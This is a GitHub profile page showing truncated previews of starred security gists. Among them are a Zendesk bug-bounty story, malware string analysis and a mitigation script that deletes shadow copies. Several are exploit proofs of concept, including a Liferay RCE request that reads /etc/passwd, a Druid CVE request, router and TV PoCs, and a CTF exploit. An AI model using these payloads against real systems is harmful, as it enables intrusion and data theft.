Skip to content

Instantly share code, notes, and snippets.

View lifa123's full-sized avatar
💭
I may be slow to respond.

muuk lifa123

💭
I may be slow to respond.
924 followers · 16.7k following
  • china
View GitHub Profile
@hackermondev
hackermondev / zendesk.md
Last active April 24, 2025 04:34
1 bug, $50,000+ in bounties, how Zendesk intentionally left a backdoor in hundreds of Fortune 500 companies

hi, i'm daniel. i'm a 15-year-old with some programming experience and i do a little bug hunting in my free time. here's the insane story of how I found a single bug that affected over half of all Fortune 500 companies:

say hello to zendesk

If you've spent some time online, you’ve probably come across Zendesk.

Zendesk is a customer service tool used by some of the world’s top companies. It’s easy to set up: you link it to your company’s support email (like [email protected]), and Zendesk starts managing incoming emails and creating tickets. You can handle these tickets yourself or have a support team do it for you. Zendesk is a billion-dollar company, trusted by big names like Cloudflare.

Personally, I’ve always found it surprising that these massive companies, worth billions, rely on third-party tools like Zendesk instead of building their own in-house ticketing systems.

your weakest link

@blotus
blotus / log4j_exploitation_attempts_crowdsec.md
Last active December 29, 2023 12:24
IPs exploiting the log4j2 CVE-2021-44228 detected by the crowdsec community

This list is no longer updated, thus the information is no longer reliable.

You can see the latest version (from october 2022) here

@hazcod
hazcod / CVE-2021-36934.bat
Created July 22, 2021 11:32
CVE-2021-36934 manual mitigation in commandprompt.
echo > CVE-2021-36934 fixer
echo See https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934
echo Deleting current shadow copies...
vssadmin delete shadows /all /quiet
echo Fixing privilege issue...
icacls %windir%\system32\config\*.* /inheritance:e
echo Creating brand new shadow copy...
@tahaconfiant
tahaconfiant / hydromac_strings.txt
Created June 3, 2021 17:43
Hydromac Decrypted strings
encrypted string at 0x100051a6a decoded to :
encrypted string at 0x100051b2c decoded to : IOPlatformExpertDevice
encrypted string at 0x100051ff5 decoded to :
encrypted string at 0x100051ffe decoded to : BadAllocException
encrypted string at 0x100052057 decoded to : -
encrypted string at 0x100052060 decoded to : OutOfRangeException
encrypted string at 0x100051e12 decoded to : -
encrypted string at 0x100051e1b decoded to : BadAllocException
encrypted string at 0x100051e74 decoded to : -
encrypted string at 0x100051e7d decoded to : OutOfRangeException
@lbherrera
lbherrera / cache.php
Last active June 5, 2021 03:36
Source code for the exploit used in the "AppCache's forgotten tales" article (https://blog.lbherrera.me/posts/appcache-forgotten-tales/).
<html manifest="manifest.php?patternA=<?php echo $_GET["patternA"]; ?>&patternB=<?php echo $_GET["patternB"]; ?>&prefix=<?php echo $_GET["prefix"]; ?>">
<body>
<script>
let patternA = new URL(location).searchParams.get("patternA");
let patternB = new URL(location).searchParams.get("patternB");
let prefix = new URL(location).searchParams.get("prefix") || '';
applicationCache.addEventListener("cached", () => {
fetch("https://bugs.chromium.org/p/chromium/issues/entryafterlogin", {
mode: "no-cors",
@mishrasunny174
mishrasunny174 / exploit.py
Created March 21, 2021 18:27
Securinets CTF Quals 2021 | PWN | KILL SHOT
#!/usr/bin/env python3
from pwn import *
HOST, PORT = 'bin.q21.ctfsecurinets.com', 1338
# HOST, PORT = 'localhost', 1338
exe = ELF('./kill_shot')
libc = ELF('./libc_kill_shot.so')
def get_proc():
if args.REMOTE:
@vavkamil
vavkamil / strong-tv-dos-poc.html
Last active March 11, 2021 11:41
strong-tv-dos-poc.html
<html>
<head>
<title></title>
</head>
<body>
<h1>Strong TV DoS exploit</h1>
<h2>Proof of Concept</h2>
<label for="internal_ip">Any internal IP:</label>
<input type="text" name="internal_ip" id="internal_ip" autocomplete="off" onchange="get_tv_ip()">
<br><br>
@vavkamil
vavkamil / hue-cors.html
Created March 9, 2021 10:37
<html>
<head>
<title>Hue Bridge CORS PoC</title>
<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://discovery.meethue.com/")
xhr.send();
xhr.onreadystatechange = function(e) {
var hue_ip;
@pikpikcu
pikpikcu / LiferayRCE(CVE-2020-7961).md
Last active September 9, 2022 03:46
POC Liferay RCE(CVE-2020-7961) 
POST /api/jsonws/invoke HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
cmd2: cat /etc/passwd
Content-Type: application/x-www-form-urlencoded
Content-Length: 4956
Connection: close

cmd=%7B%22%2Fexpandocolumn%2Fupdate-column%22%3A%7B%7D%7D&p_auth=%3Cvalid+token%3E&formDate=%3Cdate%3E&columnId=123&name=asdasd&type=1&defaultData%3Acom.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F63
@pikpikcu
pikpikcu / CVE-2021-25646.md
Last active January 10, 2022 12:32
CVE-2021-25646 
POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1006
Connection: close